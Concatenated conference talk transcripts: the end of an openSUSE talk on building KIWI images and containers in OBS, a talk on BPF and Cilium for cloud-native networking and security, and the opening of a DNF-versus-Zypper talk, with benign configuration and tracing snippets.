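</image>

A real official image defines quite a bit more than this, but the overall shape — description, preferences, repositories, package lists — is the one described above.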
What makes maintaining this easier is using patterns, which you probably heard a bit about in the previous talk about DNF. Then it looks like this instead of a 200-line list of packages: you just say, I want this pattern in this profile and that pattern in the other profile, instead of actually listing 200 packages per KIWI file — that's just unmaintainable. It also makes it easier to keep the package selection synchronized between the DVD installation, which has no such explicitly defined package list, and the KIWI image files you have. Then you can just edit a pattern spec file and say, yes, I want this package A in all MicroOS images, for instance, and the images are automatically rebuilt with those packages. I just mentioned soft dependencies — those are actually something to look out for. Soft dependencies are expressed in RPM files using Recommends and Supplements. Technically, Suggests and Enhances also count, but for KIWI files they don't actually matter, as they don't pull in any packages; normally they just give hints to the solver, for example which branding is recommended or required, so that the openSUSE flavor is suggested instead of the upstream flavor, for instance. The issue is that a huge number of packages are recommended by some other package somewhere — too many to fit on a CD or DVD, which is quite a mess. So we actually have tools which try to balance those recommended packages. If you pull in, for instance, the X11 pattern, you also get the X11 optional pattern recommended, which then has some recommends of its own. So if you install just X11 and you want a basic IceWM desktop, you end up with far more than that — you don't really want that, especially not if you are as constrained as a CD and you just want to install a minimal desktop. Recommends are definitely important, though, because some stuff just doesn't work right if they are ignored. We have some bug reports about that: users install using the only-requires option, sometimes because they say, yeah, it saves two gigabytes of space — but yes, you also might actually lose the bootloader. That's not a good idea. We can't make the bootloader a hard dependency of the minimal base pattern in this case, as you can definitely have images which do not need GRUB: you can technically use a different bootloader, or just not have a bootloader at all if something else takes care of that. The other example, for Supplements, is the breeze4-style package, which is only installed if you have both breeze5-style installed — which is required by a pattern — and libqt4. If the Supplements get ignored and you then install a package using Qt 4, you don't have the fitting style and it just looks weird. The question is what you can actually do about those dependencies and those issues. One option is to just ignore them: mention every package you actually need manually and disable honoring of soft dependencies. That sometimes breaks, because patterns change and recommends change, and you would need to take care of that manually — I heavily recommend using openQA for that stuff. The other option is, of course, to enable soft dependencies and take care of blacklisting packages, explicitly telling KIWI not to include them. That can also be a mess and is pretty hard to maintain: when the build fails due to a size constraint violation, you have to find out which package to ignore, as recommended packages can in turn recommend other packages.
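As a rough sketch of how those two approaches are expressed in a KIWI file — I believe the packages element takes a patternType attribute and patterns can be referenced as named collections, but treat the exact spelling as approximate for your KIWI version:

<!-- option 1: pull in a pattern and honor its soft dependencies -->
<packages type="image" patternType="plusRecommended">
  <namedCollection name="enhanced_base"/>
</packages>

<!-- option 2: ignore soft dependencies and list everything you need explicitly -->
<packages type="image" patternType="onlyRequired">
  <package name="kernel-default"/>
  <package name="grub2"/>
</packages>

These are alternatives for one and the same image, not meant to be combined in a single description.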
With the blacklisting approach, you have to find a place in the dependency tree where you can basically just say, no, I don't want this package anymore, and then ten other packages are also not installed anymore. This is the approach the live CDs use, but none of the other images I'm aware of, so it should probably not be copied. The better approach is to have patterns which pull in all the packages that would normally only be pulled in via soft dependencies. Another option is RPM's exclude-docs, which can also be a mess, as some packages don't take into account that documentation files can be excluded, and some files in RPMs are automatically marked as documentation — everything in /usr/share/doc. So if a user says he doesn't want documentation installed on his system, those files are just not there, and RPM doesn't even complain if you ask it to verify that the package is installed correctly: the file isn't there, and RPM doesn't help you. Sometimes configuration files are marked as %doc by mistake, and that's quite a mess. To enable exclude-docs you have to set a specific option, rpm-excludedocs, in the KIWI XML file, but you also have to take care of setting the option in the installed system — otherwise every package you install inside the image later will again pull in documentation. A different problem is that license files also used to be marked as documentation, so many images that said documentation should not be installed didn't have any license files in them, which is, for most licenses, actually a violation — those images can't really be distributed. This is mostly fixed in Tumbleweed and also mostly fixed in Leap, but for older versions, like the Leap 42.x and SLE 12 era, this wasn't completely done, so you really have to check that every package you install has a license file in the image. Container images are special in that they don't normally have anything to do with block devices: there's no filesystem or kernel to care about, you don't have to care about booting, which also means you don't have to add an init system like systemd. Metadata is much more important for containers, because containers are basically just blobs. If you say, I want to pull openSUSE Leap, you get Leap, and then you have a tarball with Leap inside, but you don't actually know which Leap. So we need to use labels to tag those images: yes, this contains Leap 15.1, and yes, this got built in 2019, this contains this version of that package, and other labels which might be useful. Derived containers are built on top of other images, which is a difference compared to other image types like qcow2 or VM images — so you actually have to resolve dependencies between images. If you want to build a container based on openSUSE Leap — let's say a Cilium container — you say: I want to base Cilium on the openSUSE Leap container. OBS then downloads the latest version of the openSUSE Leap container referenced in the project config, and KIWI just adds packages on top of that image. Container labels are quite complex. We need labels for the image version, the build count, and much more, so we actually have 16 labels to define. And we have to define each label twice, as the current labeling system for Docker containers means that if you derive an image, it overwrites all labels defined in the base image.
That means we have to add, for every base image and for every derived image, another set of labels duplicating the existing information, so that you don't overwrite all copies of this information. Of course, this is a mess if you have to define all those 16 labels by hand. But we have OBS helping us: we can run custom scripts before the build using OBS services. It looks like this in a _service file — you just say, yes, I want the kiwi_metainfo_helper script to run before building, and I want the kiwi_label_helper to run as well (a sketch of such a file follows below). That way, the labels only look like this, which is much less messy than the previous one, as you can see there — it's actually doable. And most of this content is auto-generated, as you can see by the placeholders between percent signs, like the build-time marker. About official images: what makes an image official? Of course, it has to build on OBS, so that everyone can download the source, and it is signed with the official openSUSE signing keys, so that everyone can verify that the binary is authentic. That way it also takes care of honoring the GPL, as everyone can download the image sources for the corresponding image, which OBS makes easier using the disturl label, which is also defined in the list here. So if you have a Docker container or another image, you always know which source on OBS it was built from, and the exact version — you can check it out using osc directly if you want to. An official image also has to go through the whole openSUSE review process, which not only means an independent review from a community member of the openSUSE review team, but also legal checks that you don't include any files under a proprietary license or a license you cannot distribute binaries of. And it can only use packages from the openSUSE project on OBS, which also went through the review process. So you can be pretty confident that an image officially built by openSUSE actually only contains openSUSE. If you want to submit your own image to openSUSE, it's actually as easy as submitting it to the openSUSE distribution project on OBS. If you build it in your home project, you can do whatever changes you want; then just submit it to openSUSE:Factory after doing the usual stuff, like picking a devel project and maybe finding some co-maintainers who can take care of it if you're not available. For new images there is an extra step to actually make the image downloadable, which normally means pinging someone from the release team on IRC or writing a mail. That should be a relatively painless process, as the image is normally building already at that point. KIWI profiles are a really handy feature to build multiple images from the same KIWI file. So if you want one container for LXC and one for Docker, you don't actually need to write it twice: you can say, take this KIWI file, please build this for Docker, and please also build it for LXC. For that you define a profile in the KIWI header, which you also probably can't read, and then you can say: for the LXC profile I want a different package selection. You tell KIWI that using a profiles="LXC" attribute on the packages element, and then a different package selection follows. This is especially handy if you combine it with the OBS _multibuild feature, which uses one of those magic comments from above — the OBS-Profiles comment you can see on the right — which is parsed by OBS before building.
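A sketch of such a _service file — the two helper services do exist in openSUSE's OBS setup, but treat the exact attributes here as an approximation:

<services>
  <!-- fills in build time, disturl and similar metadata placeholders -->
  <service name="kiwi_metainfo_helper" mode="buildtime"/>
  <!-- generates the duplicated label set so derived images keep the information -->
  <service name="kiwi_label_helper" mode="buildtime"/>
</services>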
The second piece is the _multibuild file, which defines which profiles to build. With that, just a single package on OBS builds two images, one with the Docker package selection and one with the LXC package selection. One complex example is MicroOS, which combines a flavor and a platform — the flavor being something like container host, or just plain MicroOS, which is MicroOS without any container engine on it, and the platform being KVM and Xen, VMware, OpenStack, can be anything. You definitely do not want to create a KIWI image description for every one of those combinations; that's just too much work, and profiles can be used for that. What got implemented just for this use case is profiles which depend on other profiles. In this case, the "container host on KVM and Xen" profile depends on the container host profile and the KVM-and-Xen profile: the container host profile pulls in the packages you need for the container runtime, and the KVM-and-Xen profile contains the packages you need for KVM and Xen, like the guest agents, for instance. Another useful package is live-add-yast-repos, which you definitely want to use if you build your own custom image that is not based on an existing container. It's a package which sets up the official openSUSE repositories in your image build, by using the same control XML that is used during DVD installations. It's parsed at build time, and it then adds the fitting repositories for your distribution: if you build against Leap, it pulls in the Leap OSS repository, for instance, and if you build against Tumbleweed, it pulls in the Tumbleweed OSS repositories. This also works for different architectures, as, for instance, the Tumbleweed ARM repositories have a different URL than the Tumbleweed x86 repositories. You can easily use that by just installing the live-add-yast-repos package in your KIWI file and then calling add-yast-repos in config.sh, and it's taken care of. The package can then be removed again, but you can also keep it if you want — it's tiny anyway. The release process for openSUSE images is fairly complicated, but you don't really need to know it in detail; you just tell the release team that your image is ready for publishing on download.opensuse.org or in the openSUSE container registry. Images are all built inside the openSUSE:Factory main project in the images repo, and the binaries are then released into a separate project when the new snapshot is built. From there, openQA notices that a new image was built, pulls it and runs a few tests, depending on the image. And if it's green, the project is released into the publishing project. Containers take a different path and go to the openSUSE container registry. The Docker Hub images have a different workflow: they are pulled, after about 15 minutes, by a different bot running on a different system and copied from the openSUSE container registry to Docker Hub. And here are some resources you can definitely use if you want to build your own images. There's a wiki page specifically about building derived containers, and there's also a link to the image templates page on OBS. And what you definitely do not want to miss if you work with KIWI is the official auto-generated documentation for the XML format, which documents literally everything you can do with KIWI, always for the latest version, at this link. It tells you exactly which XML element is expected where, and also what each XML element means.
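Circling back to the _multibuild file mentioned before the MicroOS example: the file itself is tiny. A sketch for the Docker/LXC case could look roughly like this — each flavor name is matched against the profiles defined in the KIWI file via the OBS-Profiles comment (older setups use <package> instead of <flavor>, if I remember correctly):

<multibuild>
  <flavor>Docker</flavor>
  <flavor>LXC</flavor>
</multibuild>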
That documentation is the ultimate source of truth, as it's generated from the files which KIWI uses internally to parse those XML files — so it's always correct. Yes, and that's it. Any questions? OK. Does it support multi-architecture — creating the container images not just for x86, but ARM and POWER, et cetera? Yes, OBS does that natively. If multiple architectures are enabled in a container project, OBS actually merges them together and pushes them all at once. And you can even mix them from different projects: for instance, the openSUSE images for ARM are built in a different project than the openSUSE images for x86. They're just merged into the same project, and OBS does the magic so that they are both available as opensuse/leap, for instance. Cool. This is more of a statement, but if you look at the soft dependencies with patterns in Tumbleweed again, you'll find some things fixed — like, the minimal base pattern doesn't recommend GRUB anymore. And we'd like the patterns to be more useful for containers, so if anyone can suggest more changes, we're happy to consider them. You said that the derived containers pull, let's say, the container they should use as a base. Does that also mean it creates layers instead of basically rebuilding the container? Yes, that's done by skopeo and umoci automatically. So basically, if I use them all together, my registry only downloads the base container once and then merges the layers? Yes, OBS keeps those layers separate. It's not visible on OBS directly, but the layers themselves are different tarballs stacked on top of each other, referenced using the usual hashes. With this control-XML mechanism that you've shown, is this limited to OBS-provided repositories, or can it be any URL of any third-party repository as well? It can be any URL which OBS can map to a local project — you can write the repositories as HTTP URLs, but they have to be reachable from OBS as OBS packages. If you write, for instance, download.opensuse.org/repositories/home:/something, it has to map to a home project. But you can't just pull packages from Fedora if you want to; that doesn't work, as OBS builds don't have internet access. OBS has to resolve those dependencies all internally, and you can't access packages which are not inside OBS. For official openSUSE images, you have to make sure that the image only pulls in obsrepositories:/, which means that it honors the project configuration. This is necessary so that if you have an updated image in a staging, it builds against the packages in the staging and doesn't pull in anything from a home project, for instance. No more questions? OK, so thanks for listening. Thank you.
In this talk I explain how containers based on openSUSE Leap and Tumbleweed should be built and how the process for building and submitting official images works.
10.5446/54401 (DOI)
My background is very Linux-specific: I've been a kernel developer for about 15 years, not for SUSE — I was working for Red Hat for 10 years — but obviously, we're all friends. So let me grab this slide presenter. I would like to introduce to you why we actually started with Cilium, and for that I would like to give you some background. Before I even started working with computers, computers were already a thing, and the age that I'm about to present I didn't even experience myself. But I would like to walk you through how we have been running applications over the last 20-plus years. In the very beginning there was this dark age where we had single-tasking: the CPU was not even shared. This I did not experience — I was not into computers when this happened — but we were already running applications, or code. We then went into a phase where we introduced multi-tasking, and all of a sudden the CPU and memory were shared, but the application would still run and directly consume CPU, memory and so on. This was the age when Linux distributions started popping up — SUSE got started, Red Hat got started, and so on. We then entered the age of virtualization. We figured: I don't want to deploy my application on a server and install it directly; I would like to virtualize this, run VMs, and run many applications on a particular server, but inside of a VM. At this point we started virtualizing literally everything: we had virtual routers, virtual switches, virtual storage. Everything we had before was done again, but with a V put in front of it. What we're going through right now is that we're coming back: we're moving out of VMs again, and we're running applications that directly consume Linux APIs again. Applications are now containers; we are consuming Linux system call APIs again, and we're making applications share the operating system. So we're kind of going back to the multi-tasking age in some way. And this change back is why we started Cilium, because most of the infrastructure tooling we have today was actually written for the virtualization age, where we would typically serve network packets or storage for virtual machines, and not for applications specifically. So what does that mean — how does the Linux kernel cope with this new age of microservices and the cloud-native world? Let's take a look at some of the problems that arise when we run microservices or containers on Linux. First of all, the Linux kernel basically consists of a ton of abstractions that have been introduced over the years. I'm listing a couple of them here; there are many, many more. We have the driver level; on top of that we have the network device level, for example, and traffic shaping built on top, then routing, iptables, filtering. Then we have sockets with the different protocol layers. We cannot actually bypass many of those; we are forced to consume each of them in the right order. And over the years we have accumulated a lot of code in the Linux kernel, and right now this definitely increases the chance that you hit, for example, a performance penalty in some layer that we would actually like to get rid of.
In the last couple of years we've seen some of this complexity move to user space for that reason, because not everybody was willing to pay this cost. We looked at this and said: this is actually not ideal — let's find a solution where we can work with the existing abstractions but bypass them when necessary, for example. We'll go into the details. Another thing is the Unix way of doing things: every single subsystem in the Linux kernel has its own API. We don't have one big tool to control everything; every single subsystem is controlled by a separate tool. To pick a few examples: we have ethtool, we have ip, we have ifconfig, we have seccomp, we have iptables, we have tc, we have tcpdump, we have brctl, we have ovs-vsctl, and so on — a wide range of tools, and users have to consume every single one of them. And a user is not necessarily an actual human; it could be an automated tool that controls the system. All of these tools are calling these APIs, and it is becoming very difficult to orchestrate them all together. A very specific example: if you have five or six tools on your machine, on your node, all consuming iptables and trying to install iptables rules, they actually conflict with each other. The last example of what makes this difficult is that cloud-native computing requires the operating system to continue evolving, because it now again consumes the operating system in a very native way. The Linux kernel development process has some good sides and some bad sides. The good sides are definitely an open and transparent process — this is probably the biggest benefit of Linux, that it's completely open. Excellent code quality, at least we think so. It's very stable, because a lot of people are running it and it has been stabilized over many years. It's available everywhere — it literally runs on every piece of hardware — and it's almost entirely vendor-neutral. But then there are some bad things as well. (My slide pointer is a bit slow here; that's why I'm struggling a bit.) It's really, really hard to change. Getting a Linux kernel change in literally takes weeks or months: from intent to implementation to getting a change merged takes weeks, and then it takes months or years until that change actually makes it down to the users. So once we have identified a need for a change, it takes us years to actually get it to the end user for consumption. This is why we see most of the tooling we build consuming very old APIs: cloud-native computing tooling is currently built on, for example, iptables, which was built 25 years ago and was never intended for this at all. But we're really struggling to do anything else, because it's so hard to change the kernel and make that change available to users quickly. The kernel has a very large and complicated code base, simply because of backwards compatibility: we were never actually removing code, we were only adding, adding, adding, and then everything we ever added we have to support for however many years — we never actually remove anything ever again. Upstreaming code is hard, not just from a complexity perspective but also from a consensus-finding perspective: for everything we change, pretty much everybody has to agree to it. This makes it hard and time-consuming, and, as I already said, it can take years to become available. So these are some of the problems we have been struggling with.
And then the last one: the kernel doesn't actually really know what a container is, or what the base unit of an application is at this point. So let's figure out what the kernel actually knows and what it doesn't know. The kernel knows about processes and it knows about thread groups; it doesn't actually know specifically what an application is. It knows about cgroups — containers consume cgroups — it has limits, it can do accounting, it can limit CPU, it can limit memory, it can limit network. The cgroup is typically configured by the container runtime. It knows about namespaces. This is where the confusion, or the assumption, comes from that containers are some sort of isolation. What this literally means is that the kernel will namespace certain data structures and, for example, have multiple network namespaces, multiple user namespaces, multiple mount namespaces, and so on. It still doesn't actually know what a container is; all it knows is that it has multiple namespaces for data structures. It knows about IP addresses and port numbers — this is configured by the container networking. And it knows about system calls being made, and it knows about the SELinux context. That is pretty much what the kernel knows about. It does not actually know that I'm running this particular container. Some examples of things the kernel has no clue about: the kernel does not know what Kubernetes is. The kernel does not know what a Kubernetes pod is. The kernel does not know what the container ID is — no clue. The kernel does not know what the application actually would like to run. So if you're running a Kubernetes pod which consists of multiple containers, the kernel does not know that these containers are actually supposed to work together. All of these things make the kernel struggle to provide a good application framework, because there is no native concept such as a container in the kernel. It only provides the tooling, and the container runtime on top uses those instruments. So what do we do? Containers are clearly a thing, and containers are winning. We have a couple of options. We can give all of the hardware away to user space, and user space can rewrite everything from scratch — we've seen a couple of examples of that, like DPDK or RDMA. Typically this has been done for performance, not for functionality needs. Another alternative would be unikernels: we can start writing something like a new kernel per application and have applications consume their own pieces of the operating system, only what they actually need. We can move the entire operating system to user space — User-Mode Linux has been a thing, it has been tried, and some people are using it. Or we can decide to rewrite the entire Linux kernel, which is probably a hard task and quite expensive — the calculation up on the slide is very old; it's probably way more expensive to actually really do it. But this is an option we could follow. So, this is the background: it's clearly not a perfect fit, so let's look at how we could do it better. And in order to understand BPF, which is what we're using, we need to understand what the kernel actually does: it's fundamentally an event-driven program.
We have interrupts coming from the hardware side, and we have system calls coming from our applications and processes, and the kernel executes code based on these events. That's fundamentally what the kernel does; there's not much more to it. (Sorry, it takes about ten seconds to go to the next slide.) So what is BPF? BPF takes this base assumption that everything is event-driven and makes the Linux kernel programmable. It introduces what we call a highly efficient in-kernel virtual machine, which means we have a sandbox concept where we can run code in a safe and efficient manner every time certain events are handled or pop up inside the Linux kernel. Let's look at a couple of examples: we can run a BPF program every time a system call is made, or we can run a BPF program every time a block I/O device is accessed. We can run a BPF program every time a network packet is received or sent. We can run one for every tracepoint — for example when a TCP retransmission event happens. We can run one for kernel probes, so for arbitrary kernel functions, and even for user-space application functions with uprobes — you can run a BPF program when your application code calls a particular function. Wow. So we can extend and program the Linux kernel with arbitrary additional logic when certain events happen. This is the promise of BPF, and this is why so many people are excited about it. BPF in the wild — the slide seems to struggle to load some of the logos. The first example, on the top left, is Facebook. Facebook is a heavy, heavy user of BPF: all their infrastructure load balancing and DDoS mitigation is done in BPF today. Second example, Google: QoS, traffic optimization, network security, profiling. We don't know that much about this, because they're just consuming BPF in its raw form and do all of these things without telling the world a lot about it — you can find some information at conferences where they do talks, but typically they're not broadcasting everything publicly. Then SUSE: SUSE is using BPF via Cilium to do networking, advanced security, load balancing and traffic optimization. Cloudflare is using BPF for DDoS mitigation. Sysdig Falco is using BPF for container runtime and behavioral security profiling. Red Hat is using BPF for profiling and tracing, and they're working on an iptables replacement upstream. Then, of course, Cilium, which we'll talk about next. And even Chrome is using BPF: when you have Chrome plugins and you run them, BPF is used to sandbox the plugins and make sure they can only execute certain system calls. So all of you are already heavily using BPF, but so far it has been well hidden as a kernel-level implementation detail. So what does BPF look like? It's a virtual machine — what does that mean in practice? I can write a program like this simple example and say: this program runs when the exec system call is executed and returns. In this example I'm collecting some samples — for example, measuring how many of those system calls I am making. But I could actually make this program more complex and, for example, say: no, you are not allowed to make this system call. Or I could modify the system call arguments. So I have a lot of flexibility in what I can do.
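The program on the slide itself isn't reproduced here, but as a hedged illustration of the idea — run a small piece of code every time the execve system call fires — here is a minimal sketch using the BCC Python bindings (BCC is just one of several front-ends for writing BPF programs; the helper names assume a reasonably recent bcc):

from bcc import BPF

# Tiny BPF program in restricted C: runs on every execve() in the system.
prog = r"""
int on_exec(void *ctx) {
    bpf_trace_printk("execve observed\n");
    return 0;
}
"""

b = BPF(text=prog)
# Attach the program to the kernel entry point of the execve syscall.
b.attach_kprobe(event=b.get_syscall_fnname("execve"), fn_name="on_exec")
print("Tracing execve()... hit Ctrl-C to stop")
b.trace_print()

Instead of just printing, the same program could count events or inspect arguments, and — with the right program type — a BPF program can even reject a call, which is exactly the flexibility being described here.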
Again, that is a very simplistic example that just shows the idea. Let me do a very quick introduction to how you work with BPF. Normally you write code in pseudo-C, you compile that, and you load it into the Linux kernel. The Linux kernel will verify that the program is safe, it will compile it — we'll talk about that later — and then run it. In order for these programs to communicate with the outside world, which would be user space, you can use BPF maps, which are data structures that can be accessed from both BPF programs and user space. This is how you can expose, for example, data that you have gathered to a user-space process. There are many types of BPF maps: hash tables, arrays, the perf ring buffer, and so on. We can call BPF helpers: BPF helpers allow BPF programs to interact with the Linux kernel, so not everything has to be done natively in BPF code. You can call kernel helpers, for example, to change content in a network packet or to redirect the packet to another network device, and so on — all of that is done by BPF helpers. We can do tail calls, so we can call other BPF programs, similar to function calls. And we have a JIT compiler, which means we write generic bytecode that can run on any architecture, and the JIT compiler in the Linux kernel will automatically compile that into x86, ARM, PPC, whatever — so it runs at native execution speed. This is a snapshot of the BPF contributors list, to give you an idea of who is behind BPF — and there are many, many companies behind it. It is maintained by two main engineers, Daniel Borkmann and Alexei Starovoitov; Daniel is working on Cilium, Alexei is working for Facebook. And you can see contributions from Red Hat, Netronome, Facebook, Cloudflare, and so on. So it's not a Cilium-specific implementation in any way; this is widely supported. Who uses BPF? Facebook is probably the most prominent example, and they started at a very large scale early on: I think it was in 2018 that one of their traffic engineers stood up at a conference talk and basically said, well, every single packet into a Facebook data center since May 2017 has gone through a BPF program. And the world was kind of: wow — nobody had any clue that they had been using this in production for so long. So let's transition into Cilium. I talked about BPF and it sounds exciting, but who wants to write low-level C code, or actually write these programs by hand? This is why we saw the incredible potential of BPF and figured: how can we apply this to the cloud-native world, to Docker, Kubernetes, and so on? And this is why we created Cilium. Cilium is an open source project, Apache licensed, and it provides networking, security and load balancing for the cloud-native world. I will dive into several examples. A very simple one is Kubernetes networking — it's called CNI. In this simple model we just provide networking for Kubernetes: if you run containers, if you run pods in Kubernetes, Cilium does all of the routing, all of the networking for these pods and ensures that pods can talk to each other. We also implement Kubernetes services. Kubernetes services are a way to make applications scalable and give them a virtual IP, a service IP, so you can reach many replicas of the same container via one single IP — this is how you make your services highly available.
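Before going further into the Cilium examples, one more hedged BCC-based sketch to illustrate the BPF maps mentioned a moment ago — a hash map that the in-kernel program writes and user space reads through the bindings (again an approximation, not code from the talk):

from time import sleep
from bcc import BPF

prog = r"""
BPF_HASH(counts, u32, u64);      // map: PID -> number of execve() calls

int on_exec(void *ctx) {
    u32 pid = bpf_get_current_pid_tgid() >> 32;
    counts.increment(pid);       // BCC convenience wrapper around a map update
    return 0;
}
"""

b = BPF(text=prog)
b.attach_kprobe(event=b.get_syscall_fnname("execve"), fn_name="on_exec")

sleep(10)                        # let some events accumulate

# The very same map is visible from user space via the bindings.
for pid, count in b["counts"].items():
    print("pid %d made %d execve() calls" % (pid.value, count.value))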
Back to Kubernetes services: Cilium provides a BPF-based implementation which scales better. The main reason it scales better than the traditional iptables model is that iptables is a linear list of rules — you literally scan through the list until you find a matching entry and then execute it. The BPF implementation uses a scalable hash table, which is just faster and better. We can do cluster mesh, so we can connect multiple clusters together — not only on the networking level, but we can also do service load balancing across multiple clusters. For example, I can say that this service should be highly available, so I will deploy it over multiple clusters and have Cilium do the load balancing: when all the replicas in one cluster fail, it will automatically fail over. You can define service affinity and say it should always prefer a local replica first, and only move over if no local replicas are available. So we can connect multiple clusters together. We can do identity-based security. What does that mean? Very simple: firewalls used to work on IP addresses, so you would configure the firewall to say allow from this IP, allow to this IP, or allow this subnet. What we're doing is a bit more modern: we're giving an identity to every service, to every container, and we're encoding the identity in all communication, in all packets that are emitted — you can see this here, this yellow box. And when we receive those packets, we can authenticate and validate the identity of the sending container. This is more secure and much more scalable. We can do API-aware authorization. What does that mean? It's again a step from the VM age into the container age, because typically we would have done something like this: we would either have an L3 firewall rule, or you say this service can talk to this service, or this container can talk to this container — typically based on IP addresses, container names, or pod labels. Then you say, OK, I want to be a bit more fine-grained and lock it down to a particular port — let's say you can only talk on port 80. But this is still a problem in the new cloud-native age, because everybody is using gRPC, REST APIs, and so on. So as soon as you open up, let's say, port 80, you open up your entire REST API. What we can do instead is lock it down and say: yes, you can talk on port 80, but you can only do a GET to /foo, and everything else is blocked — if you do a PUT to /bar, we will block it automatically. That's a cloud-native, container-aware, API-aware firewall, and this is what we believe is necessary for the new age that is coming up. To give you an example — we support many protocols; HTTP is obviously one, but Cassandra is another — you can go as deep as saying: I want this container to be able to talk to a Cassandra cluster, but it should only be able to do a SELECT, and only on this table. So no inserts, no updates, and it cannot access any other tables. You can really start locking things down, and this is absolutely fundamental in the age of containers and microservices, because you will have many services talking to shared resources — Cassandra, Kafka, Redis, memcached, all of them will be shared — and you need security to actually lock this down properly. Going deeper, we'll also have services that talk to the outside of the cluster.
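As a concrete illustration of the GET-to-/foo example above, here is a hedged sketch of such a rule as a CiliumNetworkPolicy. The label names are invented, but the overall structure follows the CiliumNetworkPolicy CRD as I understand it:

apiVersion: "cilium.io/v2"
kind: CiliumNetworkPolicy
metadata:
  name: frontend-to-backend-get-foo
spec:
  endpointSelector:
    matchLabels:
      app: backend
  ingress:
  - fromEndpoints:
    - matchLabels:
        app: frontend
    toPorts:
    - ports:
      - port: "80"
        protocol: TCP
      rules:
        http:
        - method: "GET"
          path: "/foo"

The DNS-based case described next uses the same mechanism on the egress side, with toFQDNs rules and a matchPattern instead of plain IP- or label-based rules.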
So it's not just service-to-service communication. You might have a service that is talking, let's say, to suse.de. How do you secure that? suse.de may only be backed by a couple dozen IPs or so, but as you start talking to something like AWS S3 or drive.google.com, those services are literally backed by thousands of IP addresses, and there's no way you can whitelist that based on IPs — it's not even a known subnet that would represent the service. So how do you specify security that allows the service to talk to S3 or to drive.google.com, but not to anything else? In this case we use DNS-aware policy. A simple example: there's a frontend service, and it's doing an HTTP request to suse.de. Obviously it would first do a DNS request, so it would resolve suse.de, and in the case of Kubernetes the DNS server would return and say: hey, this is the IP address of suse.de. With Cilium we can define a policy that says: you can talk, but only to something that resolves to *.suse.de. Cilium and BPF will look at the DNS communication, record the IP that was returned by the DNS server, and then whitelist only that particular IP. So it's not polling or trying to look up all the possible IPs of the DNS name — it's actually looking at what the DNS server responds and then only allowing that communication. That's another example of the cloud-native security that we need. Then we can do fancy stuff. Who knows about service mesh? A couple of fans — great. Service mesh, very briefly, is the concept that you run a sidecar proxy in every pod, and all the communication between services goes through that sidecar proxy — it basically gets proxied. This allows you to implement mutual TLS, retries, tracing, load balancing — for example path-based load balancing — canary releases, and so on. The downside is that this introduces a lot of overhead, because instead of having one connection between services, you have a connection from service to proxy, proxy to proxy, and proxy to service — so from one to three. The memory consumption explodes, the latency explodes, and so on. But this sidecar proxy is always running on the same node, on the same machine as the service. So why do TCP? TCP was designed to survive a nuclear blast — why would we want to do TCP there? What we do is recognize this connection, see that both sockets — the socket of the application and the socket of the proxy — are on the same node, and simply start copying the data between the sockets. This gives us about a 3x performance increase; you can see it on the slides there. It's fantastic, all thanks to the power of BPF, which gives us this flexibility. And then, looking into the future, we can do something like transparent SSL visibility. Maybe some of you have heard about kTLS, kernel TLS. It was done by some of the big providers of video streaming content when they started enabling TLS: they really started to care about how expensive it is to deliver that video with SSL encryption, and it turns out that if you offload the SSL encryption from the application library into the Linux kernel, it gives you a 3% to 4% performance increase. That's why kTLS was done. We can use kTLS to gain insight into the data the application is sending, even if the application is using SSL.
And with that we can, for example, do the layer 7 or HTTP-aware filtering even if the application is using SSL. If you want to learn more about this, there's a KubeCon talk from last year that goes into all of the details. So, Cilium use cases — we went through them; this is a summary. Cilium provides container networking. It's highly efficient, using the same techniques and the same methods that Facebook and Google and all the others are using internally. It can run in multiple modes: routing mode, overlays, cloud-provider-native modes. We support IPv4 and IPv6 — in fact, we were IPv6-only for the first year; we tried to go really native and say everything will be IPv6 at some point. We can do multi-cluster routing. We can do service load balancing, really scalably — there we're not doing any L7 or path-based routing, but we're doing efficient L3/L4. We implement Kubernetes services, replacing kube-proxy, and we can do service affinity. We can do cloud-native security — all the examples we covered: identity-based, layer-7-aware, DNS-aware, and so on. We can do encryption, so we can encrypt everything transparently: you basically turn it on and we encrypt everything inside the cluster and across clusters. And we can do the service mesh acceleration. All of these are key components for running services or containers in a very efficient and secure way on Linux. And all of this we do as part of the Linux kernel, which means it's completely transparent to the application, because it basically looks like a property of the operating system. With this — that's all the slides I had. I'm sure you have several questions; I think we have some time for them. Yes — I will also repeat the question, but feel free to just shout. The question is: does it support mutual TLS? Cilium itself does not do mutual TLS, but you can run Envoy, Istio, Linkerd or anything like that on top. It does support encryption and authentication, but we're not using TLS for that. We have a method where we can integrate with, for example, SPIFFE — SPIFFE is a service identity provider — but we use IPsec in the Linux kernel to actually enforce it. So we get transparent authentication, but it's not mTLS specifically. Any more questions? All right, thank you very much. If you want to learn more, here are the links: Slack, GitHub, website, Twitter, and so on. Thank you very much.
Linux is the dominant platform to run microservices using cloud-native architectures. These modern architectures impose new challenges on the platform serving the applications. We'll take a peek at BPF and Cilium and how it revolutionizes both networking and security to enable platforms built on top of it to fully utilize the benefits of cloud-native architectures. Thomas Graf is Co-Founder & CTO at Isovalent and creator of the Cilium project. Before this, Thomas has been a Linux kernel developer at RedHat for many years.
10.5446/54403 (DOI)
Hello, everyone. So, my name is Neal Gompa. I'm a contributor in the Fedora Project as well as in openSUSE and whatnot, and I'm here to talk about DNF versus Zypper — you know, fight! — because, you know, why not? A little bit about who I am: I'm sort of a self-styled open source advocate. I'm a contributor and package maintainer in Fedora, Mageia and openSUSE, and I've contributed to RPM, DNF, Zypper, KIWI, the Open Build Service and a number of system-management-related things. For my day job, I'm a DevOps engineer at Datto, a disaster recovery, backup and business continuity company. Part of my role involves managing the release engineering of our software, including running an OBS instance internally and doing terrible package backport things, because, you know, that's what always happens when you're in a corporate environment. So let's start with introducing the two package managers — beginning with the one that most of y'all probably aren't too familiar with. If the slide would move — there we go. DNF. It's the successor to the Yellowdog Updater, Modified, or YUM, which a lot of people may vaguely know from the Red Hat ecosystem. It was forked from YUM about five, six years ago to rework the internals to use the libsolv library and to offer a saner, maintainable API. It offers a defined plugin architecture for extending the package manager's functionality. It is the package manager in Fedora, OpenMandriva, Yocto, and now Red Hat Enterprise Linux as of RHEL 8. It is also available as a supported package manager in Mageia. It is included in openSUSE as of Leap 15.0, and it was actually included in RHEL 7 as of RHEL 7.6 as an option for you to use instead of crappy old YUM. And then, of course, the classical Zypper thing — you guys all kind of know this. It's the package manager that created a whole new class of package managers by itself, with SAT solving at a large scale. It replaced the motley of crazy-ass package management options that were inherited from Ximian and SUSE back when the two companies came together after Novell bought them both. It spawned the development of libsatsolver, which became libsolv. It is used primarily today in, of course, the SUSE distributions as well as Tizen. And it has also been in Fedora since Fedora 26, courtesy of yours truly — it is kind of functional all the 